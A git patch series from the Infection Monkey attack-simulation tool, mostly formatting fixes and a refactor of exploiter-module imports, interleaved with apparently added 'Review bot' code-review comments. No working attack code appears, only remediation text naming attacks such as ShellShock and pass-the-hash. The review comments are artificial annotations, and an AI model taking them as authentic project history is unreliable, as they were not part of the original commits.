@@ -61,7 +63,7 @@ $default-color: #e0ddde; padding: 0 7px 7px 7px; border: 2px solid rgb(232, 228, 228); border-top: 0; - display:block !important; + display: block !important; transition: height $transition; overflow: hidden; } @@ -75,12 +77,15 @@ $default-color: #e0ddde; &.collapsing { transform: translateY(-$offset); } + &.collapse-comp { transform: translateY(-$offset); } + &.expanding { transform: translateX(0px); } + &.expanded { transform: translateX(0px); } diff --git a/monkey/monkey_island/cc/utils.py b/monkey/monkey_island/cc/utils.py index 58dff1f5a..01c69e648 100644 --- a/monkey/monkey_island/cc/utils.py +++ b/monkey/monkey_island/cc/utils.py @@ -10,7 +10,6 @@ from ring import lru __author__ = 'Barak' - # Local ips function if sys.platform == "win32": def local_ips(): @@ -19,6 +18,7 @@ if sys.platform == "win32": else: import fcntl + def local_ips(): result = [] try: From e627c8c85742764bfe1e6c481908a0cc2a6142fc Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:14:22 +0200 Subject: [PATCH 35/53] Manual fix - auto formatter failed --- monkey/monkey_island/cc/resources/telemetry_feed.py | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/monkey/monkey_island/cc/resources/telemetry_feed.py b/monkey/monkey_island/cc/resources/telemetry_feed.py index 8a8c750b4..6333f2feb 100644 --- a/monkey/monkey_island/cc/resources/telemetry_feed.py +++ b/monkey/monkey_island/cc/resources/telemetry_feed.py 
@@ -22,9 +22,8 @@ class TelemetryFeed(flask_restful.Resource): if "null" == timestamp or timestamp is None: # special case to avoid ugly JS code... telemetries = mongo.db.telemetry.find({}) else: - telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) \ - \ - telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) + telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) + telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) try: return \ From dd461b974b219506083d243d68758ad589a5737c Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:20:29 +0200 Subject: [PATCH 36/53] Manual fix - auto formatter is confused again :-1: --- .../cc/services/reporting/aws_exporter.py | 34 +++++++++---------- 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 19293f991..1df12e2eb 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -208,9 +208,9 @@ class AWSExporter(Exporter): description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " "over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - ssh_key=issue['ssh_key']), + machine=issue['machine'], + ip_address=issue['ip_address'], + ssh_key=issue['ssh_key']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
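Review bot: `dateutil.parser.parse(timestamp)` on the new `find(...)` line is applied to a caller-supplied value with no error handling, so a `timestamp` that is not a parseable date raises `ValueError` (or `OverflowError`) out of the handler; the `try:` further down only wraps the return. Parse it first and reject bad input explicitly, e.g. `try: since = dateutil.parser.parse(timestamp)` / `except (ValueError, OverflowError): return {'error': 'invalid timestamp'}, 400` (or whatever error shape this resource's other paths use), then `find({'timestamp': {'$gt': since}})`. Where `timestamp` comes from is not visible in the hunk, but the `"null"` special-casing suggests a request parameter. The enclosing method starts before the hunk and continues past its last line.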
@@ -224,8 +224,8 @@ class AWSExporter(Exporter): description="Update your Elastic Search server to version 1.4.3 and up.", recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], - issue['ip_address']), + issue['machine'], + issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -269,7 +269,7 @@ class AWSExporter(Exporter): recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " "shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + issue['machine'], issue['ip_address'], issue['port'], issue['paths']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -284,9 +284,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " "protocol with user {2} and its password.".format( - issue['machine'], - issue['ip_address'], - issue['username']), + issue['machine'], + issue['ip_address'], + issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -301,9 +301,9 @@ class AWSExporter(Exporter): "network.", recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over " "the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -318,9 +318,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " "pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -361,7 +361,7 @@ class AWSExporter(Exporter): description="This critical machine is open to attacks via strong users with access to it.", recommendation="The services: {services} have been found on the machine thus classifying it as a critical " "machine. These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + services=issue['services'], threatening_users=issue['threatening_users']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -386,7 +386,7 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=10, title="Oracle WebLogic servers are vulnerable to remote code execution.", - description="Install Oracle critical patch updates. Or update to the latest version. " \ + description="Install Oracle critical patch updates. Or update to the latest version. " "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack." "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware " From 1f598579ee178f651c8a5050837b3453d1f7570a Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:22:14 +0200 Subject: [PATCH 37/53] Linter fixes in `common` --- monkey/common/cloud/aws_instance.py | 2 -- monkey/common/cloud/aws_service.py | 1 - monkey/common/cmd/aws/aws_cmd_result.py | 1 - monkey/common/data/__init__.py | 1 + monkey/common/data/network_consts.py | 1 - monkey/common/data/zero_trust_consts.py | 2 +- monkey/common/network/network_range.py | 3 +-- monkey/common/utils/code_utils.py | 2 -- monkey/common/utils/mongo_utils.py | 1 - 9 files changed, 3 insertions(+), 11 deletions(-) diff --git a/monkey/common/cloud/aws_instance.py b/monkey/common/cloud/aws_instance.py index 5178b0938..4339fbcf4 100644 --- a/monkey/common/cloud/aws_instance.py +++ b/monkey/common/cloud/aws_instance.py @@ -4,14 +4,12 @@ import urllib.request import urllib.error import logging - __author__ = 'itay.mizeretz' AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254" AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS) ACCOUNT_ID_KEY = "accountId" - logger = logging.getLogger(__name__) diff --git a/monkey/common/cloud/aws_service.py b/monkey/common/cloud/aws_service.py index b435b23c7..6ef385542 100644 --- a/monkey/common/cloud/aws_service.py 
+++ b/monkey/common/cloud/aws_service.py @@ -14,7 +14,6 @@ COMPUTER_NAME_KEY = 'ComputerName' PLATFORM_TYPE_KEY = 'PlatformType' IP_ADDRESS_KEY = 'IPAddress' - logger = logging.getLogger(__name__) diff --git a/monkey/common/cmd/aws/aws_cmd_result.py b/monkey/common/cmd/aws/aws_cmd_result.py index c8647bfe4..3499f8d14 100644 --- a/monkey/common/cmd/aws/aws_cmd_result.py +++ b/monkey/common/cmd/aws/aws_cmd_result.py @@ -1,6 +1,5 @@ from common.cmd.cmd_result import CmdResult - __author__ = 'itay.mizeretz' diff --git a/monkey/common/data/__init__.py b/monkey/common/data/__init__.py index a379a4743..978540b10 100644 --- a/monkey/common/data/__init__.py +++ b/monkey/common/data/__init__.py @@ -1,2 +1,3 @@ from .zero_trust_consts import populate_mappings + populate_mappings() diff --git a/monkey/common/data/network_consts.py b/monkey/common/data/network_consts.py index 5fc9d6d8a..b194c9421 100644 --- a/monkey/common/data/network_consts.py +++ b/monkey/common/data/network_consts.py @@ -1,2 +1 @@ ES_SERVICE = 'elastic-search-9200' - diff --git a/monkey/common/data/zero_trust_consts.py b/monkey/common/data/zero_trust_consts.py index ae27b1c35..7135485da 100644 --- a/monkey/common/data/zero_trust_consts.py +++ b/monkey/common/data/zero_trust_consts.py @@ -58,7 +58,7 @@ PRINCIPLES = { PRINCIPLE_DATA_TRANSIT: "Secure data at transit by encrypting it.", PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.", PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandetory " - "Access Control) only.", + "Access Control) only.", } POSSIBLE_STATUSES_KEY = "possible_statuses" diff --git a/monkey/common/network/network_range.py b/monkey/common/network/network_range.py index 7393ceda2..6a1201e07 100644 --- a/monkey/common/network/network_range.py +++ b/monkey/common/network/network_range.py 
@@ -59,7 +59,7 @@ class NetworkRange(object, metaclass=ABCMeta): ips = address_str.split('-') try: ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1]) - except ValueError as e: + except ValueError: return False return True return False @@ -173,4 +173,3 @@ class SingleIpRange(NetworkRange): return None, string_ # If a string_ was entered instead of IP we presume that it was domain name and translate it return ip, domain_name - diff --git a/monkey/common/utils/code_utils.py b/monkey/common/utils/code_utils.py index b50e01fb0..214e6d108 100644 --- a/monkey/common/utils/code_utils.py +++ b/monkey/common/utils/code_utils.py @@ -1,5 +1,3 @@ - - # abstract, static method decorator # noinspection PyPep8Naming class abstractstatic(staticmethod): diff --git a/monkey/common/utils/mongo_utils.py b/monkey/common/utils/mongo_utils.py index 48d632bcd..854109b30 100644 --- a/monkey/common/utils/mongo_utils.py +++ b/monkey/common/utils/mongo_utils.py @@ -80,4 +80,3 @@ class MongoUtils: continue return row - From 530e1a3b658748841998d6fcab698cdf4c58c504 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:25:37 +0200 Subject: [PATCH 38/53] Whitespace fixes --- monkey/common/cloud/aws_service_test.py | 10 +++++----- monkey/infection_monkey/network/info.py | 5 ----- 2 files changed, 5 insertions(+), 10 deletions(-) diff --git a/monkey/common/cloud/aws_service_test.py b/monkey/common/cloud/aws_service_test.py index ae9c4b5d3..cbcbfebcd 100644 --- a/monkey/common/cloud/aws_service_test.py +++ b/monkey/common/cloud/aws_service_test.py 
@@ -10,14 +10,14 @@ class TestFilterInstanceDataFromAwsResponse(TestCase): def test_filter_instance_data_from_aws_response(self): json_response_full = """ { - "InstanceInformationList": [ - { + "InstanceInformationList": [ + { "ActivationId": "string", "AgentVersion": "string", - "AssociationOverview": { + "AssociationOverview": { "DetailedStatus": "string", - "InstanceAssociationStatusAggregatedCount": { - "string" : 6 + "InstanceAssociationStatusAggregatedCount": { + "string" : 6 } }, "AssociationStatus": "string", diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index 1418c22cc..6b9c5811e 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py @@ -47,24 +47,19 @@ def get_host_subnets(): if is_windows_os(): - def local_ips(): local_hostname = socket.gethostname() return socket.gethostbyname_ex(local_hostname)[2] - def get_routes(): raise NotImplementedError() - else: from fcntl import ioctl - def local_ips(): valid_ips = [network['addr'] for network in get_host_subnets()] return valid_ips - def get_routes(): # based on scapy implementation for route parsing try: f = open("/proc/net/route", "r") From 933dc9c3783671496be837b49c78bca39414272f Mon Sep 17 00:00:00 2001 From: Shivank Date: Wed, 30 Oct 2019 11:06:25 +0530 Subject: [PATCH 39/53] Second File-saver patch --- .../cc/ui/src/components/pages/ConfigurePage.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js index a5aeae3ec..5cbd758cf 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js 
@@ -1,7 +1,7 @@ import React from 'react'; import Form from 'react-jsonschema-form'; import {Col, Modal, Nav, NavItem} from 'react-bootstrap'; -import FileSaver from "file-saver"; +import FileSaver from 'file-saver'; import AuthComponent from '../AuthComponent'; import { FilePond } from 'react-filepond'; import 'filepond/dist/filepond.min.css'; @@ -309,10 +309,10 @@ class ConfigurePageComponent extends AuthComponent { exportConfig = () => { this.updateConfigSection(); - const JSONString = JSON.stringify(this.state.configuration, null, 2); - const blob = new Blob([JSONString], {type: "text/plain;charset=utf-8"}); + const configAsJson = JSON.stringify(this.state.configuration, null, 2); + const configAsBinary = new Blob([configAsJson], {type: "text/plain;charset=utf-8"}); - FileSaver.saveAs(blob, 'monkey.conf'); + FileSaver.saveAs(configAsBinary, 'monkey.conf'); }; sendConfig() { From 2517ab02843dd5f5b944b85b63388406053bdd99 Mon Sep 17 00:00:00 2001 From: Daniel Goldberg Date: Wed, 30 Oct 2019 15:28:57 +0200 Subject: [PATCH 40/53] Move get_interface_to_target to network, helping prevent a circular import between pba.py and exploiter modules. --- monkey/infection_monkey/exploit/sambacry.py | 2 +- monkey/infection_monkey/exploit/sshexec.py | 3 +- .../infection_monkey/exploit/tools/helpers.py | 44 ------------------- .../exploit/tools/http_tools.py | 3 +- .../exploit/tools/smb_tools.py | 3 +- monkey/infection_monkey/exploit/weblogic.py | 2 +- monkey/infection_monkey/monkey.py | 2 +- monkey/infection_monkey/network/tools.py | 40 +++++++++++++++++ .../post_breach/actions/users_custom_pba.py | 2 +- monkey/infection_monkey/transport/http.py | 2 +- monkey/infection_monkey/tunnel.py | 3 +- 11 files changed, 51 insertions(+), 55 deletions(-) diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py index e3825eac9..5a39f485b 100644 --- a/monkey/infection_monkey/exploit/sambacry.py +++ b/monkey/infection_monkey/exploit/sambacry.py 
@@ -20,7 +20,7 @@ from infection_monkey.exploit import HostExploiter from infection_monkey.model import DROPPER_ARG from infection_monkey.network.smbfinger import SMB_SERVICE from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth -from infection_monkey.exploit.tools.helpers import get_interface_to_target +from infection_monkey.network.tools import get_interface_to_target from infection_monkey.pyinstaller_utils import get_binary_file_path from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index 4a88c4593..a7e9571b5 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py @@ -7,10 +7,9 @@ import paramiko import infection_monkey.monkeyfs as monkeyfs from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline -from infection_monkey.exploit.tools.helpers import get_interface_to_target from infection_monkey.model import MONKEY_ARG +from infection_monkey.network.tools import check_tcp_port, get_interface_to_target from infection_monkey.exploit.tools.exceptions import FailedExploitationError -from infection_monkey.network.tools import check_tcp_port from common.utils.exploit_enum import ExploitType from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem diff --git a/monkey/infection_monkey/exploit/tools/helpers.py b/monkey/infection_monkey/exploit/tools/helpers.py index 91a25c270..8e2b1342d 100644 --- a/monkey/infection_monkey/exploit/tools/helpers.py +++ b/monkey/infection_monkey/exploit/tools/helpers.py 
@@ -1,52 +1,8 @@ import logging -import socket -import struct -import sys - -from infection_monkey.network.info import get_routes LOG = logging.getLogger(__name__) -def get_interface_to_target(dst): - """ - :param dst: destination IP address string without port. E.G. '192.168.1.1.' - :return: IP address string of an interface that can connect to the target. E.G. '192.168.1.4.' - """ - if sys.platform == "win32": - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - try: - s.connect((dst, 1)) - ip_to_dst = s.getsockname()[0] - except KeyError: - LOG.debug("Couldn't get an interface to the target, presuming that target is localhost.") - ip_to_dst = '127.0.0.1' - finally: - s.close() - return ip_to_dst - else: - # based on scapy implementation - - def atol(x): - ip = socket.inet_aton(x) - return struct.unpack("!I", ip)[0] - - routes = get_routes() - dst = atol(dst) - paths = [] - for d, m, gw, i, a in routes: - aa = atol(a) - if aa == dst: - paths.append((0xffffffff, ("lo", a, "0.0.0.0"))) - if (dst & m) == (d & m): - paths.append((m, (i, a, gw))) - if not paths: - return None - paths.sort() - ret = paths[-1][1] - return ret[1] - - def try_get_target_monkey(host): src_path = get_target_monkey(host) if not src_path: diff --git a/monkey/infection_monkey/exploit/tools/http_tools.py b/monkey/infection_monkey/exploit/tools/http_tools.py index 297e064fc..56bb5ef1f 100644 --- a/monkey/infection_monkey/exploit/tools/http_tools.py +++ b/monkey/infection_monkey/exploit/tools/http_tools.py 
@@ -7,7 +7,8 @@ from threading import Lock from infection_monkey.network.firewall import app as firewall from infection_monkey.network.info import get_free_tcp_port from infection_monkey.transport import HTTPServer, LockedHTTPServer -from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target +from infection_monkey.exploit.tools.helpers import try_get_target_monkey +from infection_monkey.network.tools import get_interface_to_target from infection_monkey.model import DOWNLOAD_TIMEOUT __author__ = 'itamar' diff --git a/monkey/infection_monkey/exploit/tools/smb_tools.py b/monkey/infection_monkey/exploit/tools/smb_tools.py index 51564518e..80d9c73f7 100644 --- a/monkey/infection_monkey/exploit/tools/smb_tools.py +++ b/monkey/infection_monkey/exploit/tools/smb_tools.py @@ -10,8 +10,9 @@ import infection_monkey.config import infection_monkey.monkeyfs as monkeyfs from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem -from infection_monkey.exploit.tools.helpers import get_interface_to_target +from infection_monkey.network.tools import get_interface_to_target from infection_monkey.config import Configuration + __author__ = 'itamar' LOG = logging.getLogger(__name__) diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py index ac648012b..e15625918 100644 --- a/monkey/infection_monkey/exploit/weblogic.py +++ b/monkey/infection_monkey/exploit/weblogic.py @@ -9,7 +9,7 @@ from http.server import BaseHTTPRequestHandler, HTTPServer from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit import HostExploiter -from infection_monkey.exploit.tools.helpers import get_interface_to_target +from infection_monkey.network.tools import get_interface_to_target from infection_monkey.network.info import get_free_tcp_port from http.server import BaseHTTPRequestHandler, HTTPServer 
diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index 3985c8a2e..98e2bf286 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py @@ -25,7 +25,7 @@ from infection_monkey.telemetry.trace_telem import TraceTelem from infection_monkey.telemetry.tunnel_telem import TunnelTelem from infection_monkey.windows_upgrader import WindowsUpgrader from infection_monkey.post_breach.post_breach_handler import PostBreach -from infection_monkey.exploit.tools.helpers import get_interface_to_target +from infection_monkey.network.tools import get_interface_to_target from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError from infection_monkey.telemetry.attack.t1106_telem import T1106Telem from common.utils.attack_utils import ScanStatus, UsageEnum diff --git a/monkey/infection_monkey/network/tools.py b/monkey/infection_monkey/network/tools.py index 0cac7b627..0c8d0417b 100644 --- a/monkey/infection_monkey/network/tools.py +++ b/monkey/infection_monkey/network/tools.py @@ -7,6 +7,7 @@ import struct import time import re +from infection_monkey.network.info import get_routes from infection_monkey.pyinstaller_utils import get_binary_file_path from infection_monkey.utils.environment import is_64bit_python 
@@ -269,3 +270,42 @@ def _traceroute_linux(target_ip, ttl):
 lines = [x[1:-1] if x else None # Removes parenthesis
 for x in lines]
 return lines
+
+
+def get_interface_to_target(dst):
+ """
+ :param dst: destination IP address string without port. E.G. '192.168.1.1.'
+ :return: IP address string of an interface that can connect to the target. E.G. '192.168.1.4.'
+ """
+ if sys.platform == "win32":
+ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+ try:
+ s.connect((dst, 1))
+ ip_to_dst = s.getsockname()[0]
+ except KeyError:
+ LOG.debug("Couldn't get an interface to the target, presuming that target is localhost.")
+ ip_to_dst = '127.0.0.1'
+ finally:
+ s.close()
+ return ip_to_dst
+ else:
+ # based on scapy implementation
+
+ def atol(x):
+ ip = socket.inet_aton(x)
+ return struct.unpack("!I", ip)[0]
+
+ routes = get_routes()
+ dst = atol(dst)
+ paths = []
+ for d, m, gw, i, a in routes:
+ aa = atol(a)
+ if aa == dst:
+ paths.append((0xffffffff, ("lo", a, "0.0.0.0")))
+ if (dst & m) == (d & m):
+ paths.append((m, (i, a, gw)))
+ if not paths:
+ return None
+ paths.sort()
+ ret = paths[-1][1]
+ return ret[1]
\ No newline at end of file
diff --git a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py
index 89417757d..fec47a3cd 100644
--- a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py
+++ b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py
@@ -9,7 +9,7 @@ from infection_monkey.config import WormConfiguration
 from infection_monkey.utils.monkey_dir import get_monkey_dir_path
 from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
 from common.utils.attack_utils import ScanStatus
-from infection_monkey.exploit.tools.helpers import get_interface_to_target
+from infection_monkey.network.tools import get_interface_to_target
 LOG = logging.getLogger(__name__)
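Review bot: The Windows branch's `except KeyError:` can never fire for `s.connect((dst, 1))` — a failed connect raises `OSError` (`socket.error` is its alias on Python 3) — so the documented localhost fallback is dead code and an unroutable destination propagates out of get_interface_to_target to every caller; `except OSError:` is what was intended. The body is carried over verbatim from helpers.py, so the defect is pre-existing, but the move is the natural moment to fix it and to replace the try/finally around `s.close()` with `with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:`. The function now relies on `sys`, `socket`, `struct` and `LOG` being in scope in network/tools.py; the import hunk above adds only `get_routes` and shows `struct`, while `sys` and `LOG` are not visible in this diff and should be confirmed to exist in that file. Minor: the file now ends without a trailing newline (`\ No newline at end of file`), and both docstring examples carry a stray trailing dot (`'192.168.1.1.'`).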
diff --git a/monkey/infection_monkey/transport/http.py b/monkey/infection_monkey/transport/http.py index eb1e5d355..ce0433569 100644 --- a/monkey/infection_monkey/transport/http.py +++ b/monkey/infection_monkey/transport/http.py @@ -9,7 +9,7 @@ from urllib.parse import urlsplit import infection_monkey.monkeyfs as monkeyfs from infection_monkey.transport.base import TransportProxyBase, update_last_serve_time -from infection_monkey.exploit.tools.helpers import get_interface_to_target +from infection_monkey.network.tools import get_interface_to_target __author__ = 'hoffer' diff --git a/monkey/infection_monkey/tunnel.py b/monkey/infection_monkey/tunnel.py index f2124f9fc..3544f46f3 100644 --- a/monkey/infection_monkey/tunnel.py +++ b/monkey/infection_monkey/tunnel.py @@ -7,9 +7,8 @@ from threading import Thread from infection_monkey.model import VictimHost from infection_monkey.network.firewall import app as firewall from infection_monkey.network.info import local_ips, get_free_tcp_port -from infection_monkey.network.tools import check_tcp_port +from infection_monkey.network.tools import check_tcp_port, get_interface_to_target from infection_monkey.transport.base import get_last_serve_time -from infection_monkey.exploit.tools.helpers import get_interface_to_target __author__ = 'hoffer' From 1f5acbc28709d121e0b59181039f3bba6594e5ef Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 31 Oct 2019 10:48:02 +0200 Subject: [PATCH 41/53] Another white screen fix --- .../cc/ui/src/components/pages/MapPage.js | 28 +++++++++++-------- 1 file changed, 16 insertions(+), 12 deletions(-) diff --git a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js index 4d074c835..f9d1f4a83 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js 
@@ -43,11 +43,13 @@ class MapPageComponent extends AuthComponent {
 this.authFetch('/api/netmap')
 .then(res => res.json())
 .then(res => {
- res.edges.forEach(edge => {
- edge.color = {'color': edgeGroupToColor(edge.group)};
- });
- this.setState({graph: res});
- this.props.onStatusChange();
+ if (res.hasOwnProperty("edges")) {
+ res.edges.forEach(edge => {
+ edge.color = {'color': edgeGroupToColor(edge.group)};
+ });
+ this.setState({graph: res});
+ this.props.onStatusChange();
+ }
 });
 };
@@ -55,14 +57,16 @@ class MapPageComponent extends AuthComponent {
 this.authFetch('/api/telemetry-feed?timestamp='+this.state.telemetryLastTimestamp)
 .then(res => res.json())
 .then(res => {
- let newTelem = this.state.telemetry.concat(res['telemetries']);
+ if ('telemetries' in res) {
+ let newTelem = this.state.telemetry.concat(res['telemetries']);
- this.setState(
- {
- telemetry: newTelem,
- telemetryLastTimestamp: res['timestamp']
- });
- this.props.onStatusChange();
+ this.setState(
+ {
+ telemetry: newTelem,
+ telemetryLastTimestamp: res['timestamp']
+ });
+ this.props.onStatusChange();
+ }
 });
 };
From e5715f5a7ea3286c52d4d0a252ca09477d6ba7ff Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 31 Oct 2019 12:11:22 +0200 Subject: [PATCH 42/53] Removed unnecessary logging of config in BB and MSSQL unhandled error --- envs/monkey_zoo/blackbox/tests/basic_test.py | 1 - monkey/infection_monkey/exploit/__init__.py | 6 ++++-- monkey/infection_monkey/exploit/mssqlexec.py | 4 ++-- monkey/infection_monkey/monkey.py | 6 +++++- 4 files changed, 11 insertions(+), 6 deletions(-)
diff --git a/envs/monkey_zoo/blackbox/tests/basic_test.py b/envs/monkey_zoo/blackbox/tests/basic_test.py
index d2fad4e1e..8456dccad 100644
--- a/envs/monkey_zoo/blackbox/tests/basic_test.py
+++ b/envs/monkey_zoo/blackbox/tests/basic_test.py
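Review bot: The two guards test the same condition two different ways — `res.hasOwnProperty("edges")` in the first hunk and `'telemetries' in res` in the second — and both silently discard a response that lacks the key, so a backend error body now yields a blank map and a frozen telemetry feed with nothing in the console to explain it. Use one idiom (`'edges' in res` matches the second hunk) and log the unexpected shape in an `else` branch, e.g. `} else { console.warn('Unexpected /api/netmap response', res); }`, so the failure is diagnosable instead of invisible. Both hunks sit inside arrow callbacks whose enclosing methods begin before the hunk.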
@@ -23,7 +23,6 @@ class BasicTest(object):
 self.log_handler = log_handler
 def run(self):
- LOGGER.info("Uploading configuration:\n{}".format(json.dumps(self.config_parser.config_json, indent=2)))
 self.island_client.import_config(self.config_parser.config_raw)
 self.print_test_starting_info()
 try:
diff --git a/monkey/infection_monkey/exploit/__init__.py b/monkey/infection_monkey/exploit/__init__.py
index 9e899b140..0431e7295 100644
--- a/monkey/infection_monkey/exploit/__init__.py
+++ b/monkey/infection_monkey/exploit/__init__.py
@@ -47,8 +47,10 @@ class HostExploiter(object, metaclass=ABCMeta):
 def exploit_host(self):
 self.pre_exploit()
- result = self._exploit_host()
- self.post_exploit()
+ try:
+ result = self._exploit_host()
+ finally:
+ self.post_exploit()
 return result
 def pre_exploit(self):
diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index dcad2adf1..dee597a18 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -11,7 +11,7 @@ from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
 from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth
 from infection_monkey.model import DROPPER_ARG
 from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
-from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
+from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
 LOG = logging.getLogger(__name__)
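Review bot: `exploit_host` in the exploit/__init__.py hunk now guarantees `post_exploit` runs even when `_exploit_host` raises, but nothing documents that the exception is then re-raised to the caller, or that an exception raised by `post_exploit` itself inside the `finally` becomes the propagating one (the original survives only as its `__context__`). A docstring on exploit_host would make the contract explicit for subclass authors: run pre_exploit, _exploit_host and post_exploit in that order; post_exploit always runs; any exception from _exploit_host propagates after cleanup, and FailedExploitationError is what monkey.py in this same commit treats as the expected "attempt did not succeed" signal. The enclosing class HostExploiter begins before the hunk.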
@@ -185,7 +185,7 @@ class MSSQLExploiter(HostExploiter):
 LOG.warning('No user/password combo was able to connect to host: {0}:{1}, ' 'aborting brute force'.format(host, port))
- raise RuntimeError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
